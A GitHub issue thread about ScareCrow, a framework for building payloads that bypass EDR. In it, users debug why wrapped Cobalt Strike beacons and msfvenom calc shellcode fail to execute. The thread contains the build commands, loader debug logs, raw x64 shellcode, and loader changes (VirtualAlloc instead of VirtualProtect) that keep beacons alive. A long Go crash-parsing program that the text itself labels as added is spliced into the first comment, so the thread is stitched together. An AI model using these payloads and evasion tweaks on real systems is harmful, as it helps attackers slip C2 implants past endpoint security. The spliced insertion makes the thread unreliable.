optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.
2.71k stars, 503 forks

Is this project still working? experiencing issues loading several shellcodes #69

Closed sl4cky closed 1 year ago

sl4cky commented 1 year ago

I tested the framework using different shellcodes, but I keep getting errors or nothing happens. I have used the console output for debugging.

./ScareCrow -I beacon.bin -domain www.microsoft.com -console

The shellcode is a stageless Cobalt Strike shellcode. I'm getting the following output from the console and there is no callback to the C2:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes

I also tried the Metasploit calc shellcode: msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o ok.bin

Using the same flags as before, I get the following error on the console:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000
PC=0xc000138000

runtime.cgocall(0xf0b60, 0x267ec0)
	runtime/cgocall.go:158 +0x4a fp=0xc000107e18 sp=0xc000107de0 pc=0x935ea
rnmzBzfN.JjYY7ypK(0xc000138000?, {0xc000107eb0?, 0x3?, 0x9c767?})
	runtime/syscall_windows.go:557 +0x109 fp=0xc000107e90 sp=0xc000107e18 pc=0xebea9
rnmzBzfN.ES5BzOlzgpnB(0x180050?, 0xc000013170?, 0x5?, 0x5?, 0x0?)
	runtime/syscall_windows.go:495 +0x3b fp=0xc000107ed8 sp=0xc000107e90 pc=0xebc7b
main.main()
	uSiSpGymJxKf.go:1 +0x2c7 fp=0xc000107f80 sp=0xc000107ed8 pc=0x154c07
runtime.main()
	runtime/proc.go:250 +0x1fe fp=0xc000107fe0 sp=0xc000107f80 pc=0xc7bbe
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000107fe8 sp=0xc000107fe0 pc=0xef2c1

goroutine 2 [force gc (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000045fb0 sp=0xc000045f90 pc=0xc7f56
runtime.goparkunlock(...)
	runtime/proc.go:369
runtime.forcegchelper()
	runtime/proc.go:302 +0xb1 fp=0xc000045fe0 sp=0xc000045fb0 pc=0xc7df1
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000045fe8 sp=0xc000045fe0 pc=0xef2c1
created by runtime.init.6
	runtime/proc.go:290 +0x25

goroutine 3 [GC sweep wait]:
runtime.gopark(0x1?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000047f90 sp=0xc000047f70 pc=0xc7f56
runtime.goparkunlock(...)
	runtime/proc.go:369
runtime.bgsweep(0x0?)
	runtime/mgcsweep.go:297 +0xd7 fp=0xc000047fc8 sp=0xc000047f90 pc=0xb2bd7
runtime.gcenable.func1()
	runtime/mgc.go:178 +0x26 fp=0xc000047fe0 sp=0xc000047fc8 pc=0xa7926
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0xef2c1
created by runtime.gcenable
	runtime/mgc.go:178 +0x6b

goroutine 4 [GC scavenge wait]:
runtime.gopark(0xc00001c070?, 0x1a8d00?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000057f70 sp=0xc000057f50 pc=0xc7f56
runtime.goparkunlock(...)
	runtime/proc.go:369
runtime.(*scavengerState).park(0x267800)
	runtime/mgcscavenge.go:389 +0x53 fp=0xc000057fa0 sp=0xc000057f70 pc=0xb0c13
runtime.bgscavenge(0x0?)
	runtime/mgcscavenge.go:622 +0x65 fp=0xc000057fc8 sp=0xc000057fa0 pc=0xb1225
runtime.gcenable.func2()
	runtime/mgc.go:179 +0x26 fp=0xc000057fe0 sp=0xc000057fc8 pc=0xa78c6
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000057fe8 sp=0xc000057fe0 pc=0xef2c1
created by runtime.gcenable
	runtime/mgc.go:179 +0xaa

goroutine 5 [finalizer wait]:
runtime.gopark(0x0?, 0x185b00?, 0x60?, 0x1?, 0x2000000020?)
	runtime/proc.go:363 +0xd6 fp=0xc000049e28 sp=0xc000049e08 pc=0xc7f56
runtime.goparkunlock(...)
	runtime/proc.go:369
runtime.runfinq()
	runtime/mfinal.go:180 +0x10f fp=0xc000049fe0 sp=0xc000049e28 pc=0xa6a2f
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000049fe8 sp=0xc000049fe0 pc=0xef2c1
created by runtime.createfing
	runtime/mfinal.go:157 +0x45

goroutine 18 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000053f50 sp=0xc000053f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000053fe0 sp=0xc000053f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000053fe8 sp=0xc000053fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 34 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000515f50 sp=0xc000515f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000515fe0 sp=0xc000515f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000515fe8 sp=0xc000515fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 35 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000517f50 sp=0xc000517f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000517fe0 sp=0xc000517f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000517fe8 sp=0xc000517fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 36 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000511f50 sp=0xc000511f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000511fe0 sp=0xc000511f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000511fe8 sp=0xc000511fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 19 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000055f50 sp=0xc000055f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000055fe0 sp=0xc000055f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000055fe8 sp=0xc000055fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 6 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000059f50 sp=0xc000059f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000059fe0 sp=0xc000059f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000059fe8 sp=0xc000059fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 37 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000513f50 sp=0xc000513f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000513fe0 sp=0xc000513f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000513fe8 sp=0xc000513fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

goroutine 38 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
	runtime/proc.go:363 +0xd6 fp=0xc000525f50 sp=0xc000525f30 pc=0xc7f56
runtime.gcBgMarkWorker()
	runtime/mgc.go:1235 +0xf1 fp=0xc000525fe0 sp=0xc000525f50 pc=0xa9931
runtime.goexit()
	runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000525fe8 sp=0xc000525fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
	runtime/mgc.go:1159 +0x25

rax    0xc000138000
rbx    0x267ec0
rcx    0x0
rdi    0xf11aa2f000
rsi    0xc000107e50
rbp    0xc000107e08
rsp    0xf11adffcc8
r8     0x0
r9     0x0
r10    0x0
r11    0x202
r12    0xc000013170
r13    0x0
r14    0xc000042000
r15    0xffffffffffffffff
rip    0xc000138000
rflags 0x10297
cs     0x33
fs     0x53
gs     0x2b
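The crash record in the report above carries more information than the ScareCrow debug lines do, because it is the Go runtime's dump of the Windows EXCEPTION_RECORD: the exception code (0xc0000005 is STATUS_ACCESS_VIOLATION), ExceptionInformation[0] (0 for a read, 1 for a write, 8 for a DEP execute fault), ExceptionInformation[1] (the faulting virtual address) and the PC, followed by the register file. The following is an added example, not part of this issue and not ScareCrow's code: a small Go program that parses those two lines (copied from the report; `SampleDump` holds them) and decodes them. It applies one heuristic that is an assumption of this example, not a documented API: on 64-bit targets the Go runtime asks for its first heap arena at 0x00c0 << 32, so an address of the form 0xc0_xxxx_xxxx is almost always Go-managed memory rather than a region the loader mapped itself. The names `ParseCrash`, `Diagnose`, `AccessKind` and `InGoHeapArena` are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// SampleDump holds the two informative lines of the crash report in this
// issue: the Go runtime's Windows exception record and the register dump.
const SampleDump = `Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000 PC=0xc000138000
rax 0xc000138000 rbx 0x267ec0 rcx 0x0 rdi 0xf11aa2f000 rsi 0xc000107e50 rbp 0xc000107e08 rsp 0xf11adffcc8 r8 0x0 r9 0x0 r10 0x0 r11 0x202 r12 0xc000013170 r13 0x0 r14 0xc000042000 r15 0xffffffffffffffff rip 0xc000138000 rflags 0x10297 cs 0x33 fs 0x53 gs 0x2b`

// Crash is the decoded exception record plus the register file at the fault.
type Crash struct {
	Code  uint64            // EXCEPTION_RECORD.ExceptionCode
	Info0 uint64            // ExceptionInformation[0]: 0 read, 1 write, 8 DEP execute
	Info1 uint64            // ExceptionInformation[1]: virtual address that faulted
	PC    uint64            // instruction pointer at the fault
	Regs  map[string]uint64 // rax..r15, rip, rflags, cs, fs, gs
}

var (
	// "Exception <code> <info0> <info1> <pc>" as printed by the Go runtime on Windows.
	excRe = regexp.MustCompile(`Exception (0x[0-9a-f]+) (0x[0-9a-f]+) (0x[0-9a-f]+) (0x[0-9a-f]+)`)
	// amd64 register names followed by a hex value; stack-frame fields (fp=, sp=, pc=) do not match.
	regRe = regexp.MustCompile(`\b(r(?:ax|bx|cx|dx|si|di|bp|sp|ip|flags|8|9|1[0-5])|cs|fs|gs) (0x[0-9a-f]+)\b`)
)

func hexVal(s string) uint64 {
	v, _ := strconv.ParseUint(strings.TrimPrefix(s, "0x"), 16, 64) // regex guarantees valid hex
	return v
}

// ParseCrash extracts the exception record and registers from a Go crash dump.
func ParseCrash(dump string) (Crash, error) {
	m := excRe.FindStringSubmatch(dump)
	if m == nil {
		return Crash{}, fmt.Errorf("no Go runtime Exception line found")
	}
	c := Crash{Code: hexVal(m[1]), Info0: hexVal(m[2]), Info1: hexVal(m[3]), PC: hexVal(m[4]), Regs: map[string]uint64{}}
	for _, r := range regRe.FindAllStringSubmatch(dump, -1) {
		c.Regs[r[1]] = hexVal(r[2])
	}
	return c, nil
}

// AccessKind decodes ExceptionInformation[0] of an access violation.
func AccessKind(info0 uint64) string {
	switch info0 {
	case 0:
		return "read"
	case 1:
		return "write"
	case 8:
		return "execute (DEP)"
	}
	return "unknown"
}

// InGoHeapArena is a heuristic (an assumption of this example): the Go runtime's
// first 64-bit heap arena hint is 0x00c0<<32, so 0xc0_xxxx_xxxx is Go-managed memory.
func InGoHeapArena(addr uint64) bool { return addr>>32 == 0xc0 }

// Diagnose turns the decoded record into the findings a practitioner would note.
func Diagnose(c Crash) []string {
	var out []string
	name := fmt.Sprintf("exception 0x%08x", c.Code)
	if c.Code == 0xc0000005 {
		name = "STATUS_ACCESS_VIOLATION"
	}
	out = append(out, fmt.Sprintf("%s: %s of 0x%x while executing at 0x%x", name, AccessKind(c.Info0), c.Info1, c.PC))
	if rip, ok := c.Regs["rip"]; ok && rip != c.PC {
		out = append(out, "register dump disagrees with PC: the dump is inconsistent, do not trust it")
	}
	if InGoHeapArena(c.PC) {
		out = append(out, "PC is in the Go heap arena range: control went into Go-managed memory, not into a region obtained from VirtualAlloc")
	}
	if rax, ok := c.Regs["rax"]; ok && rax == c.PC {
		out = append(out, "rax == PC: consistent with an indirect call through rax to the pointer the loader built")
	}
	if c.Info0 == 0 && c.Info1 != c.PC {
		out = append(out, "read fault rather than a DEP fault: the page at PC was executable, and the bytes there dereferenced the faulting address")
	}
	if c.Info0 == 8 {
		out = append(out, "DEP fault: the page holding the shellcode was never made executable")
	}
	return out
}

func main() {
	c, err := ParseCrash(SampleDump)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, line := range Diagnose(c) {
		fmt.Println(" -", line)
	}
}
```

Run against the dump in this issue it reports a read fault at 0x1b11ab67000 with PC (and rax) at 0xc000138000 inside the Go heap range; that is the kind of detail worth pasting into a report alongside the shellcode type and loader used, since the `[DEBUG]` lines alone show only that the loader reached its last step before the transfer.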

Tylous commented 1 year ago

Yes, this project is very much still working. It looks like it's your shellcode; unfortunately, I can't help you as I'm not sure what your shellcode looks like (posting debug outputs doesn't help me when I don't know what's being loaded). It could be a UDRL in the case of Cobalt Strike, or something else. Based on your output, I suggest you try some of the other loaders built into ScareCrow.

sl4cky commented 1 year ago

OK, will do some research and update on this. Thanks for the quick response :)

sl4cky commented 1 year ago

Posting the calc shellcode used:

\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00

Maybe it's the null bytes?

sl4cky commented 1 year ago

Tried without null bytes as well, still not working. Will check it out further and update.

chucksploit commented 1 year ago

FYI @sl4cky I was running into this same issue with fresh stageless shellcode for CS. I unloaded my UDRL and made a new payload with ScareCrow and everything was resolved.

Tylous commented 1 year ago

It sounds like it could be a UDRL issue. Hard to know for sure without all the details of the C2 and the other things going into your payload.

ptr0x1 commented 1 year ago

I ended up getting this error too; in my case the "image_size_x64" value was too low, and c2lint called it out too. Not sure if this is related to more recent changes, because the profile used to work, but maybe this helps.

I also ran into an issue where the binary output is unreliable. Sometimes it straight exits; other times I can see the beacon come in and then die (sometimes after a few successful sleep cycles). I turned off any custom settings in the profile/UDRL, but the issue persisted. I ended up modifying the loader routine so it uses VirtualAlloc + write (just like the DLL loader) instead of the pointer trickery + VirtualProtect. This solved it, and it is now consistently triggering and stays alive. Again, it used to work, so maybe the latest CS changes are causing an access violation somewhere?

chucksploit commented 1 year ago

Came back to say that I'm experiencing similar issues to @ptr0x1. With bone-stock CS shellcode (4.8 release), I will very rarely get a beacon callback, and if I do it dies shortly after. Same outcome for binary payloads and DLLs, so something must be causing issues with the new CS versions, as my previous comment was from old CS shellcode (< 4.7). I'm going to tinker with this a good bit in the coming days and see if I can find some answers.

chucksploit commented 1 year ago

I was able to implement the fix @ptr0x1 spoke about (using the DLL loader for the Binary template) and everything works fine. @Tylous I didn't submit a PR for it since it's not really a fix, but the code's in my fork here: https://github.com/chucksploit/ScareCrow. I'm still trying to see what the root cause is.

Tylous commented 1 year ago

I am working on a new version (which should be out shortly) that replaces the old binary template with 4 new ones. The Binary template no longer works with the latest versions of Go. As a result, the new version will provide several universal templates.

Tylous commented 1 year ago

ScareCrow 5.0 is out now; this should take care of this. Please feel free to re-open this if you still experience it.